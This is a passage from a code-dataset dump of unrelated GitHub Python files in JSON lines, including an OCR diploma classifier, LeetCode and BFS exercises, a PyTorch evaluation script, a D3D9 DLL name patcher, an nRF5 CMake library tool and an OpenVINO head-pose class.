cv2.imwrite('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file),tempImg)\r\n \r\n return 0\r\n\r\n text = texts[0].description\r\n text = text.replace(\"\\n\",\" \").strip()\r\n\r\n jieba.load_userdict('./jiabaDictionary/school.txt')\r\n seg_list = jieba.cut(text)\r\n \r\n for i in seg_list:\r\n if i ==' ':\r\n continue\r\n self.text.append(i)\r\n print(self.text)\r\n buffer = []\r\n for c in school:\r\n for i in self.text: \r\n if c in i:\r\n buffer.append(i)\r\n \r\n print(buffer)\r\n\r\n #沒有偵測到跟學校有關的字詞\r\n if len(buffer) == 0:\r\n print('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file))\r\n os.makedirs('./{}/unsorted/{}'.format(folderpath,file))\r\n cv2.imwrite('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file),tempImg)\r\n return 0\r\n \r\n if len(buffer) != 0:\r\n for i in buffer:\r\n if len(self.tempSchool) < len(i):\r\n self.tempSchool = i\r\n \r\n if len(self.tempSchool) < 4:\r\n print('school: Not Found')\r\n\r\n os.makedirs('./{}/unsorted/{}'.format(folderpath,file))\r\n cv2.imwrite('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file),tempImg)\r\n \r\n else:\r\n \r\n if self.tempSchool not in folderlist:\r\n os.makedirs('./{}/{}'.format(folderpath,self.tempSchool))\r\n folderlist.append(self.tempSchool)\r\n \r\n print('School: ',self.tempSchool)\r\n\r\n # 中文路徑要解碼\r\n cv2.imencode('.jpg',tempImg)[1].tofile('classify/{}/{}.jpg'.format(self.tempSchool,file)) \r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n classifiler = diplomaClassifier()\r\n\r\n path = './image'\r\n filelist = os.listdir(path)\r\n\r\n jieba.case_sensitive = True\r\n classifiler.run('152.jpg')\r\n # for file in filelist:\r\n # #print(file)\r\n # classifiler.img = cv2.imread('{}/{}'.format(path,file))\r\n # classifiler.run(file)\r\n\r\n","repo_name":"ke511081177/StudentCard_Classification","sub_path":"SCClassifier.py","file_name":"SCClassifier.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25356166352","text":"import random\ndef noReplacementSimulation(numTrials):\n '''\n Runs numTrials trials of a Monte Carlo simulation\n of drawing 3 balls out of a bucket containing\n 3 red and 3 green balls. Balls are not replaced once\n drawn. Returns the a decimal - the fraction of times 3 \n balls of the same color were drawn.\n '''\n sameColorCount = 0\n for i in range(numTrials):\n onePick = drawing()\n # if the balls picked have the same color, sameColorCount adds 1\n if sum(onePick) == 3 or sum(onePick) ==0:\n sameColorCount += 1\n \n return sameColorCount/numTrials\n \n\ndef drawing():\n '''\n Define red balls as 1, greed balls as 0,\n then the bucket list will be [1,1,1,0,0,0]\n Pick 3 balls from the bucket randomly without replacement.\n Return the list of balls being drawn randomly from bucket once\n '''\n bucket = [1,1,1,0,0,0]\n result = []\n for i in range(3):\n pickedball = random.choice(bucket)\n result.append(pickedball)\n bucket.remove(pickedball)\n return result\n \n","repo_name":"lingjiangj/MITx-6.00.2x","sub_path":"Exercises/Lecture8-Exercise 4.py","file_name":"Lecture8-Exercise 4.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10738631126","text":"#\n# @lc app=leetcode.cn id=203 lang=python3\n#\n# [203] 移除链表元素\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n if head is None:\n return head\n head.next = self.removeElements(head.next, val)\n if head.val == val:\n next_node = head.next \n else:\n next_node = head\n return next_node\n\n# @lc code=end\n\n","repo_name":"MaxZN/Leetcode","sub_path":"203.移除链表元素.py","file_name":"203.移除链表元素.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19957433111","text":"import os\nfrom tabulate import tabulate\nfrom scipy.stats import spearmanr\n\ndef getAccuracy(pred, gold):\n\tright = 0.0\n\tfor i in range(0, len(pred)):\n\t\tif pred[i]==gold[i]:\n\t\t\tright += 1.0\n\treturn right/len(pred)\n\ntypes = ['G', 'M', 'S', 'O']\n\nsystems = sorted(os.listdir('../../labels/G'))\nnames = {}\nnames['nn'] = 'SimpleNets-RNN3'\nnames['nn_adadelta'] = 'SimpleNets-RNN2'\nnames['nn_mlp'] = 'SimpleNets-MLP'\nnames['adaboost'] = 'Ada Boosting'\nnames['dectrees'] = 'Decision Trees'\nnames['gradientboost'] = 'Gradient Boosting'\nnames['randomforest'] = 'Random Forests'\nnames['sgd'] = 'SGD'\nnames['svm'] = 'SVM'\nnames['allgood'] = 'All Good'\nnames['allok'] = 'All Ok'\nnames['allbad'] = 'All Bad'\n\nscores = {}\nfor system in systems:\n\tscores[system] = []\n\nfor type in types:\n\tgold = [item.strip().split('\\t')[2] for item in open('../../corpora/'+type+'_test.txt')]\n\tgolds = [float(item.strip().split('\\t')[2]) for item in open('../../corpora/'+type+'_test.txt')]\n\tfor system in systems:\n\t\tfiles = os.listdir('../../labels/'+type+'/'+system)\n\t\tmaxacc = -1\n\t\tmaxspear = 0\n\t\tmaxfile = None\n\t\tfor file in files:\n\t\t\tpred = [item.strip().split('\\t')[0] for item in open('../../labels/'+type+'/'+system+'/'+file)]\n\t\t\tpreds = [float(item.strip().split('\\t')[1]) for item in open('../../labels/'+type+'/'+system+'/'+file)]\n\t\t\tpreds[0] = preds[0]+0.00000001\n\t\t\tacc = getAccuracy(pred, gold)\n\t\t\tif acc>maxacc:\n\t\t\t\tmaxacc = acc\n\t\t\t\tmaxfile = file\n\t\t\tspear, f = spearmanr(preds, golds)\n\t\t\tif acc>maxspear:\n\t\t\t\tmaxspear = spear\n\t\tscores[system].append((maxacc, maxspear))\n\nfor system in sorted(scores.keys()):\n\tif system in names:\n\t\tnewline = names[system]\n\t\tfor value in scores[system]:\n\t\t\tnewline += r' & $' + \"%.3f\" % value[0] + r'$ & $' + \"%.3f\" % value[1] + r'$'\n\t\tnewline += r' \\\\'\n\t\tprint(newline)\n","repo_name":"ghpaetzold/phd-backup","sub_path":"qats/scripts/evaluators/formatted_accuracy.py","file_name":"formatted_accuracy.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12494275676","text":"\r\nprint(\"Distance (1)\")\r\nprint(\"Time (2)\")\r\nprint(\"Temperature (3)\")\r\na = input(\"What do you want to convert: \")\r\n\r\nif a == 1:\r\n Distance()\r\nelif a == 2:\r\n Time()\r\nelif a == 3:\r\n Temperature()\r\nelse:\r\n print(\"Falsche Eingabe\")\r\n\r\n","repo_name":"floriangtfr/Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23710717568","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom fishDataset import fishDataset\nfrom torch.utils.data import Dataset, DataLoader\nfrom CNNmodel import *\nimport torch.optim as optim\n\nclasses = (\"ALB\", \"BET\", \"DOL\", \"LAG\", \"NoF\", \"OTHER\", \"SHARK\", \"YFT\")\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ntransform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize((155, 227)),\n transforms.ToTensor(),\n transforms.Normalize((0.4042, 0.4353, 0.3998), (0.2251, 0.2185, 0.2127))\n])\n\nbatch_size = 4\n\ndataset = fishDataset(\"FishBoxes/Fishes/\",\n \"FishBoxes/labels.csv\", trans=transform)\n\n# il dataset che uso per il test è diverso dal dataset di test usato durante il training sul quale il modello ha ottenuto una accuracy\n# quindi l'accuracy sarà probabilmente maggiore (devo salvarmi il dataset di test?)\n# train_size = int(0.8 * len(dataset))\n# test_size = len(dataset) - train_size\n# trainset, testset = torch.utils.data.random_split(\n# dataset, [train_size, test_size])\n\ntestloader = DataLoader(\n dataset, batch_size=batch_size, shuffle=True)\n\ndataiter = iter(testloader)\nimages, labels = dataiter.next()\n\nimages = images.to(device)\n\nPATH = './SimpleCNN/SavedModels/simpleModelWithAdamW_86.8%/simpleModelWithAdamW_86.8%.pth'\nnet = SimpleModel()\nnet.load_state_dict(torch.load(PATH))\nnet.to(device)\n\n\n# def imshow(img):\n# invTrans = transforms.Compose([transforms.Normalize(mean=[0., 0., 0.],\n# std=[1/0.2251, 1/0.2185, 1/0.2127]),\n# transforms.Normalize(mean=[-0.4042, -0.4353, -0.3998],\n# std=[1., 1., 1.]),\n# ])\n# img = img.cpu()\n# img = invTrans(img)\n# npimg = img.numpy()\n# plt.imshow(np.transpose(npimg, (1, 2, 0)))\n# plt.show()\n\n\n# print('GroundTruth: ', ' '.join(f'{classes[labels[j]]:5s}' for j in range(4)))\n# imshow(torchvision.utils.make_grid(images))\n\n# outputs = net(images)\n\n# outputs.to(device)\n\n# _, predicted = torch.max(outputs, 1)\n\n# print('Predicted: ', ' '.join(f'{classes[predicted[j]]:5s}'\n# for j in range(4)))\n\n\ncorrect = 0\ntotal = 0\n# since we're not training, we don't need to calculate the gradients for our outputs\nwith torch.no_grad():\n for data in testloader:\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n # calculate outputs by running images through the network\n outputs = net(images)\n # the class with the highest energy is what we choose as prediction\n _, predicted = torch.max(outputs.data, 1)\n print(outputs.data)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\nprint(\n f'Accuracy of the network on the whole dataset: {100 * correct // total} %')\n\n\n# prepare to count predictions for each class\ncorrect_pred = {classname: 0 for classname in classes}\ntotal_pred = {classname: 0 for classname in classes}\n\n# again no gradients needed\nwith torch.no_grad():\n for data in testloader:\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n outputs = net(images)\n _, predictions = torch.max(outputs, 1)\n # collect the correct predictions for each class\n for label, prediction in zip(labels, predictions):\n if label == prediction:\n correct_pred[classes[label]] += 1\n total_pred[classes[label]] += 1\n\naccPerClass = {}\n# print accuracy for each class\nfor classname, correct_count in correct_pred.items():\n accuracy = 100 * float(correct_count) / total_pred[classname]\n accPerClass[classname] = accuracy\n\n # print(f'Accuracy for class: {classname:5s} is {accuracy:.1f} %')\n\nd_view = [(v, k) for k, v in accPerClass.items()]\nd_view.sort(reverse=True) # natively sort tuples by first element\nfor v, k in d_view:\n # print(\"%s: %d\" % (k, v))\n print(f'Accuracy for class: {k:6s} is {v:.1f} %')\n","repo_name":"LeonardoBerti07/Image-Classification-Project","sub_path":"SimpleCNN/testSavedModels.py","file_name":"testSavedModels.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28178089252","text":"\"\"\"\r\n新建一个链表,next用两个链表当前位置去比较,谁的小就放谁。\r\n当一个链表放完之后,说明另外一个链表剩下的元素都比较大,再放进去就好。\r\n复杂度O(m+n)\r\n\"\"\"\r\ndef mergeTwoLists(l1,l2):\r\n #先判断是否在两个链表中\r\n if not l1 and not l2:\r\n return None\r\n #创建新链表用于添加比较完大小的元素\r\n result = ListNode(0)\r\n l = result\r\n while l1 and l2:\r\n if l1.val < l2.val:\r\n l.next = l1\r\n l1 = l1.next\r\n else:\r\n l.next = l2\r\n l2 = l2.next\r\n #融合后链表的下一位,当前位置刚刚赋值\r\n l = l.next\r\n #把剩余的链表排在后面\r\n l.next = l1 or l2\r\n #融合后链表从第二个对象开始返回,第一个对象是自己创建的ListNode(0)\r\n return result.next\r\n \r\n","repo_name":"jasonusaco/Leetcode-Practice","sub_path":"Linked List/lc21.py","file_name":"lc21.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15956383689","text":"# import numpy for use of matrix multiplication\nimport numpy as np\n# import scipy for use in linear regression base testing\nfrom scipy import linalg\n# allows data input processing\nimport pandas as pd\n# allows a deep copy\nfrom copy import deepcopy\n\n# import sklearn modules for use in lin regression\n# import function to split data\nfrom sklearn.model_selection import train_test_split\n# import function to generate mean squared error\nfrom sklearn.metrics import mean_squared_error\n# import dataset for use in boston dataset\nfrom sklearn import linear_model\n# import matplotlib to allow visualization of data\nimport matplotlib.pyplot as plt\n# import LineCollection to draw lines\nfrom matplotlib.collections import LineCollection\n\n\ndef read_table(path):\n ''' input the file as a pandas table '''\n return pd.read_csv(path,header=0)\n \n\ndef remove_columns(table):\n ''' process the data table by removing unwanted columns '''\n # find all columns that are errors\n drop_col = [x for x in table.columns if x.startswith('e')]\n # add the id to columns to remove\n drop_col.append('Nr')\n # drop preselected columns and remove rows with NaN\n proc = table.drop(drop_col,axis=1).dropna()\n # return processed data\n return proc\n\n\ndef process_data(data):\n ''' modify data such that it represents the 80% training, 20% testin '''\n # select the index for the training data\n ntrain = round(data.shape[0]*0.2)\n # split training data and target by 80% and 20%\n data_train,target_train = data[ntrain:,1:],data[ntrain:,:1]\n # split testing data and target by 80% and 20%\n data_test,target_test = data[:ntrain,1:],data[:ntrain,:1]\n # return training data and target, and testing data and target\n return data_train,target_train,data_test,target_test\n\n\ndef parse(path='data/COMBO17.csv'):\n ''' get training and testing data and target from data file '''\n # input pandas table from filepath\n init_table = read_table(path)\n # remove the columns and rows that are unusable\n table = remove_columns(init_table)\n # convert pandas table to numpy array\n data = np.array(table)\n # return the training and testing data and target\n return process_data(data)\n\n\ndef plot_lines(title,ax,target,predict):\n ''' plot a single subplot based on targets and predictions '''\n # create single scatterplot\n ax.scatter(target,predict,edgecolors=(0,0,0))\n # get minimum and maximum from target data\n data_min,data_max = np.amin(target),np.amax(target)\n # set regression line\n ax.plot([data_min,data_max],[data_min,data_max],'k.--',lw=4)\n # set the title for the subplot\n ax.set_title(title)\n # label the x axis\n ax.set_xlabel('Measured')\n # label the y axis\n ax.set_ylabel('Predicted')\n\n\ndef plot_dots(title,ax,target,predict):\n ''' plot a single subplot based on targets and predictions '''\n # get number of data points\n N = len(predict)\n # create range of values based on number data points\n x = np.arange(N)\n # get array of indeces from sorted target data\n inds = np.argsort(target.T[0])\n # sort target data\n targ_s = target.T[0][inds]\n # sort prediction data\n pred_s = predict.T[0][inds] \n # get coordinates of lines connecting target and prediction\n points = np.array([[[i, targ_s[i]], [i, pred_s[i]]] for i in range(N)])\n # create line object based on coordinates\n lines = LineCollection(points,linewidths=1,colors='black',zorder=0)\n # halve the width of the lines\n lines.set_linewidths(0.5*np.ones(N))\n # set the target points on subplot\n ax.scatter(x,targ_s,s=9,edgecolors=(0,0,0))\n # set the prediction points on the subplot\n ax.scatter(x,pred_s,s=9,edgecolors=(0,0,0))\n # add lines between target and prediction\n ax.add_collection(lines)\n # set title of subplot\n ax.set_title(title)\n # set title of x axis\n ax.set_xlabel('Measured')\n # set title of y axis\n ax.set_ylabel('Predicted')\n\n\ndef print_one(title,weight,mse_test,mse_train):\n ''' prints the mean squared errors per each type of analysis '''\n # print type of analysis\n print(title,'\\n')\n # print training mean squared error\n print('Training Mean Squared Error:',mse_train)\n # print testing mean squared error\n print('Testing Mean Squared Error:',mse_test)\n # create equation with coefficients and variables\n weight_str = [str(w)+'x'+str(i) for i,w in enumerate(weight[0])]\n # print the weight equation\n print('Weights:\\n',' + '.join(weight_str),'\\n\\n')\n\n\ndef output_one(title,target,weight,prediction,mse_test,mse_train):\n ''' output a single entry and graph '''\n # create single subplot\n fig1, ax1 = plt.subplots(1,sharex=True)\n # create single subplot\n fig2, ax2 = plt.subplots(1,sharex=True)\n # print type of analysis, weight, mean squared errors\n print_one(title,weight,mse_test,mse_train)\n # plot the linear regression line\n plot_lines(title,ax1,target,prediction)\n # plot the offset between target and prediction\n plot_dots(title,ax2,target,prediction)\n # show the graphs\n plt.show()\n\n \n\ndef linear_regression(data_train,target_train,data_test,target_test):\n ''' linear regression function from training and testing data and target '''\n # initialize linear regression object\n regr = linear_model.LinearRegression()\n # train the regression model with the training data and target\n regr.fit(data_train,target_train)\n # calculate the mean squared error for the training data\n mse_train = mean_squared_error(target_train,regr.predict(data_train))\n # calculate the predicted target from the testing data with the coefficients\n predict = regr.predict(data_test)\n # calculate the mean squared error for the testing data\n mse_test = mean_squared_error(target_test,predict)\n # return the weights, predicted target, and mean squared errors for training \n return regr.coef_,predict,mse_test,mse_train\n\n\ndef driver():\n ''' intiialize and run testing on data '''\n # return training and testing data and target\n data_train,target_train,data_test,target_test = parse()\n # git weights, predicted target, mse testing and training from linear regression model\n weights,prediction,mse_test,mse_train = linear_regression(data_train,target_train,data_test,target_test)\n # output print and graphs from processed data\n output_one('sklearn',target_test,weights,prediction,mse_test,mse_train)\n\n \nif __name__ == '__main__':\n ''' entry point of program '''\n driver()\n\n\n# end of file\n\n","repo_name":"treyamador/machine-learning","sub_path":"regression/space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21499992176","text":"from hashlib import md5\n\n\nclass D3D9Generator:\n _renderer_offset = 65780\n _renderer_len = 16\n _gpu_offset = _renderer_offset + _renderer_len\n _gpu_len = 24\n\n _full_hash = \"F72386EFF8B866EB881FE8E87261A2B3\"\n _partial_hash = \"1E5F7C4EBE25B462A8F61B40907B1BD3\"\n\n def __init__(self, source: bytes):\n self._dll_array = bytearray(source)\n\n def set_renderer(self, name: str):\n self.set_bytes(self._renderer_offset, self._renderer_len, name)\n\n def set_gpu(self, name: str):\n self.set_bytes(self._gpu_offset, self._gpu_len, name)\n\n def set_bytes(self, start: int, length: int, value: str):\n for i in range(length):\n if len(value) > i:\n self._dll_array[start + i] = ord(value[i])\n else:\n self._dll_array[start + i] = 0x00\n\n def has_full_hash(self):\n return self._full_hash.lower() in md5(self._dll_array).hexdigest().lower()\n\n def has_partial_hash(self):\n start = self._gpu_offset + self._gpu_len\n end = start + len(self._dll_array) - (self._gpu_offset + self._gpu_len)\n\n md = md5()\n md.update(self._dll_array[: self._renderer_offset - 1])\n md.update(self._dll_array[start:end])\n\n return self._partial_hash.lower() in md.hexdigest().lower()\n\n def write_dll(self, filename: str):\n with open(filename, \"wb\") as file:\n file.write(self._dll_array)\n\n\ndef main():\n with open(\"d3d9_source.dll\", \"rb\") as file:\n source_dll = file.read()\n\n generator = D3D9Generator(source_dll)\n if not generator.has_full_hash():\n raise Exception(\"Internal DLL is corrupted\")\n\n gpu = \"\"\n\n while len(gpu) == 0:\n gpu = input(\"Enter your GPU name: \")\n\n print(f\"Generating d3d9.dll for {gpu}\")\n\n generator.set_gpu(gpu)\n\n if not generator.has_partial_hash():\n raise Exception(\"Internal DLL is corrupted after setting\")\n\n generator.write_dll(\"d3d9.dll\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tinytengu/d3d9-generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1508829552","text":"from collections import deque\nimport sys\nn = int(input())\nmaap = [list(map(str, (sys.stdin.readline().strip()))) for _ in range(n)]\nvisited = [[0] * n for _ in range(n)]\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\ndef bfs(start):\n q = deque()\n q.append(start)\n visited[start[0]][start[1]] = 1\n num = 1\n while q:\n x, y = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < n and 0 <= ny < n:\n if visited[nx][ny] == 0 and maap[nx][ny] == '1':\n q.append((nx, ny))\n visited[nx][ny] = visited[x][y]\n num += 1\n return num\n\n\nnuma = 0\nnum_ans = []\nfor i in range(n):\n for j in range(n):\n if visited[i][j] == 0 and maap[i][j] == '1':\n numa += 1\n num_ans.append(bfs((i, j)))\nprint(numa)\nnum_ans.sort()\nfor k in num_ans:\n print(k)\n\n","repo_name":"YoungTae0406/bj-pg_Algorithm","sub_path":"2667_postApartNumb.py","file_name":"2667_postApartNumb.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22970886869","text":"from odoo import fields, models, api, _\n\n\nclass Contract(models.Model):\n _inherit = 'vnitpro.contract'\n\n procurement_id = fields.Many2one('vnitpro.procurement', 'Procurement', track_visibility=\"onchange\")\n procurement_formality = fields.Many2one('vnitpro.procurement.formality',\n related=\"procurement_id.procurement_formality_id\", readonly=True)\n cost_estimate = fields.Float(\n 'Cost Estimate', related=\"procurement_id.vat_information\", digits=(3, 2), readonly=True)\n price_plan = fields.Float('Price Plan', related=\"procurement_id.after_tax\", digits=(3, 2), readonly=True)\n price_won_procurement = fields.Float(\n 'Price Won Procurement', compute=\"_compute_price_won_procuremnt\", digits=(3, 2))\n\n @api.one\n @api.depends('procurement_id')\n def _compute_price_won_procuremnt(self):\n self.price_won_procurement = 0\n for expertise_result_id in self.procurement_id.expertise_result_ids:\n if expertise_result_id.expertise_results == 1:\n self.price_won_procurement = expertise_result_id.exposure_price_with_vat\n break\n","repo_name":"tu2305/VNITPro_erp","sub_path":"vnitpro_contract_procurement_rel/models/vnitpro_contract.py","file_name":"vnitpro_contract.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14731449234","text":"#!python\n\n# 文件批量操作模板\n# 导出 exe: pyinstaller --onefile --nowindowed temp.py\n\nimport os\nimport sys\n\nPIPE = \"│\"\nELBOW = \"└──\"\nTEE = \"├──\"\nPIPE_PREFIX = \"│ \"\nSPACE_PREFIX = \" \"\n\ndef list_files(startpath):\n\n for root, dirs, files in os.walk(startpath):\n break\n \n tree = [] \n for i, file in enumerate(files):\n if i == len(files)-1 and len(dirs) == 0:\n joint = ELBOW\n else:\n joint = TEE\n tree.append('{} {}'.format(joint, file))\n \n for i, dir in enumerate(dirs):\n if i == len(dirs)-1:\n joint = ELBOW\n space = SPACE_PREFIX\n else:\n joint = TEE\n space = PIPE_PREFIX\n \n tree.append('{} {}/'.format(joint, dir))\n branches = list_files(os.path.join(root,dir))\n for branch in branches:\n tree.append('{}{}'.format(space, branch))\n\n return tree\n\n\ndef processPath(startpath):\n\n tree = list_files(startpath)\n string = '../{}/\\n'.format(os.path.basename(startpath))\n\n for t in tree:\n string += '{}\\n'.format(t)\n string = string.replace('\\n', '\\n ')\n\n print(string) \n output = open(\"文件列表.txt\", \"w\", encoding='utf-8')\n output.write(string)\n output.close()\n\ndef main():\n\n # 通过在程序内输入文件或文件夹路径来执行\n if len(sys.argv) <= 1:\n processPath(\".\")\n\n # 否则通过命令行参数输入或拖入文件或文件夹到可执行程序来执行\n for i in range(1, len(sys.argv)):\n processPath(sys.argv[i])\n\nif __name__ == '__main__':\n main()\n print('\\nDONE')\n input()\n","repo_name":"wjdready/Code","sub_path":"Lang/Python/一些工具脚本/批量统计文件/temp2.py","file_name":"temp2.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7725317242","text":"from __future__ import annotations\n\nimport json\nfrom unittest import TestCase\n\nfrom nrf5_cmake.library import Library, LibraryProperty, Property\nfrom nrf5_cmake.library_description import LibraryDescription, LibraryVariant, LibraryPatch, LibraryOperation, LibraryVersion\nfrom nrf5_cmake.version import Version\nfrom typing import Any, Dict, List, Set, Tuple\n\n\ndef libraries_load_from_file(filepath: str) -> Dict[str, LibraryDescription]:\n libs: Dict[str, LibraryDescription] = {}\n with open(filepath, 'r') as file:\n json_libs: Dict[str, Any] = json.load(file)\n\n if not isinstance(json_libs, dict):\n raise Exception(\"Exampected a dictionary of libraries\")\n\n for json_lib_name in json_libs:\n json_lib = json_libs[json_lib_name]\n libs[json_lib_name] = LibraryDescription.from_json(json_lib)\n\n return libs\n\n\ndef libraries_save_to_file(filepath: str, libraries: Dict[str, LibraryDescription]):\n json_libs: Dict[str, Any] = {}\n\n with open(filepath, 'w') as file:\n for lib_name, lib in libraries.items():\n json_libs[lib_name] = lib.to_json()\n\n json.dump(json_libs, file, indent=2)\n\n\ndef libraries_dependencies_per_sdk(selected_libraries: Dict[str, LibraryDescription],\n all_libraries: Dict[str, LibraryDescription],\n supported_sdks: List[Version]) -> Dict[Version, Set[str]]:\n\n # Collect a list of dependencies for each SDK version.\n sdk_dependencies: Dict[Version, Set[str]] = {}\n for sdk_version in supported_sdks:\n\n # Get list of all dependencies including libraries\n dependencies: Set[str] = set()\n for (library_name, library_desc) in selected_libraries.items():\n library_for_sdk = library_desc.library_for_sdk_version(sdk_version)\n if library_for_sdk == None:\n continue\n\n dependencies.add(library_name)\n dependencies.update(library_for_sdk.get_prop(\n LibraryProperty.DEPENDENCIES\n ).get_all_items())\n\n # Iterate over all existing dependencies and collect new ones.\n # If expanded list of dependencies is bigger than original ones\n # continue.\n while True:\n new_dependencies = dependencies.copy()\n for dependency in dependencies:\n # Check if dependecy exists...\n if not dependency in all_libraries:\n print(f\"WARNING: dependency {dependency} doesn't exist\")\n continue\n library_dep_desc = all_libraries[dependency]\n\n # Check if dependency exists for this SDK version.\n library_dep = library_dep_desc.library_for_sdk_version(\n sdk_version)\n\n if library_dep == None:\n print(\n f\"WARNING: dependency {dependency} should exist for SDK {sdk_version}\")\n continue\n\n # Get all dependencies and apply them.\n library_dep_dep_list = library_dep.get_prop(\n LibraryProperty.DEPENDENCIES\n ).get_all_items()\n new_dependencies.update(library_dep_dep_list)\n\n # Check if two sets are the same\n if new_dependencies == dependencies:\n break\n\n # Use new extended list of dependencies.\n dependencies = new_dependencies\n\n # Add generated dependencies to version\n sdk_dependencies[sdk_version] = dependencies\n\n return sdk_dependencies\n\n\nclass LibrariesDependenciesPerSdkTestCase(TestCase):\n def test_dependencies(self):\n\n sdk_14 = Version.from_string(\"14.0.0\")\n sdk_15 = Version.from_string(\"15.0.0\")\n sdk_16 = Version.from_string(\"16.0.0\")\n\n library_a = LibraryDescription(\n variant=LibraryVariant.OBJECT,\n library=Library(\n dependencies=Property(public={\"b\"})\n ),\n sdk_version=LibraryVersion(sdk_15),\n patches=[\n LibraryPatch(\n operation=LibraryOperation.ADD,\n sdk_version=LibraryVersion(sdk_15),\n library=Library(dependencies=Property(public={\"c\"}))\n ),\n LibraryPatch(\n operation=LibraryOperation.REMOVE,\n sdk_version=LibraryVersion(sdk_16),\n library=Library(dependencies=Property(public={\"c\"}))\n ),\n LibraryPatch(\n operation=LibraryOperation.ADD,\n sdk_version=LibraryVersion(sdk_16),\n library=Library(dependencies=Property(public={\"d\"}))\n ),\n ]\n )\n\n library_b = LibraryDescription(\n variant=LibraryVariant.OBJECT,\n )\n\n library_c = LibraryDescription(\n variant=LibraryVariant.OBJECT\n )\n\n library_d = LibraryDescription(\n variant=LibraryVariant.OBJECT,\n library=Library(dependencies=Property(public={\"e\"}))\n )\n\n library_e = LibraryDescription(\n variant=LibraryVariant.OBJECT\n )\n\n library_f = LibraryDescription(\n variant=LibraryVariant.OBJECT\n )\n\n all_libraries = {\n \"a\": library_a,\n \"b\": library_b,\n \"c\": library_c,\n \"d\": library_d,\n \"e\": library_e,\n \"f\": library_f\n }\n\n supported_sdks = [\n sdk_14,\n sdk_15,\n sdk_16\n ]\n\n result = libraries_dependencies_per_sdk(\n {\"a\": library_a},\n all_libraries,\n supported_sdks\n )\n\n self.assertEqual(result[sdk_14], set())\n self.assertEqual(result[sdk_15], {\"a\", \"b\", \"c\"})\n self.assertEqual(result[sdk_16], {\"a\", \"b\", \"d\", \"e\"})\n","repo_name":"Polidea/cmake-nRF5x","sub_path":"ci/scripts/python/nrf5_cmake/library_operations.py","file_name":"library_operations.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"} +{"seq_id":"71532367414","text":"'''\nThis is a sample class for a model. You may choose to use it as-is or make any changes to it.\nThis has been provided just to give you an idea of how to structure your model class.\n'''\n\nfrom openvino.inference_engine import IENetwork, IECore\nimport cv2\nimport numpy as np\nimport math\nimport time\nfrom model import Model_X\n\nclass HeadPoseEstimation(Model_X):\n '''\n Class for the Face Detection Model.\n '''\n \n def __init__(self, model_name, device='CPU', extensions=None):\n super().__init__(model_name, device='CPU', extensions=None)\n \n def predict(self, image, face_image, face_boxes, display_flag=True):\n '''\n TODO: You will need to complete this method.\n This method is meant for running predictions on the input image.\n '''\n input_img = self.preprocess_input(face_image)\n input_name = self.input_name\n input_dict={input_name:input_img}\n\n start=time.time()\n self.net.start_async(request_id=0, \n inputs=input_dict)\n status = self.net.requests[0].wait(-1)\n if status == 0:\n inference_time = time.time()- start\n outputs = self.net.requests[0].outputs\n face_image, angles = self.preprocess_output(outputs, image, face_image, face_boxes, display_flag)\n return face_image, angles, inference_time\n\n def preprocess_input(self, image):\n '''\n Before feeding the data into the model for inference,\n you might have to preprocess it. This function is where you can do that.\n '''\n n, c, h, w = self.input_shape\n input_img = image\n input_img=cv2.resize(input_img, (w,h), interpolation = cv2.INTER_AREA)\n input_img = input_img.transpose((2,0,1))\n input_img = input_img.reshape((n, c, h, w))\n return input_img\n\n def preprocess_output(self, outputs, image, face, facebox, display_flag):\n '''\n Before feeding the output of this model to the next model,\n you might have to preprocess the output. This function is where you can do that.\n '''\n p = outputs['angle_p_fc'][0][0]\n 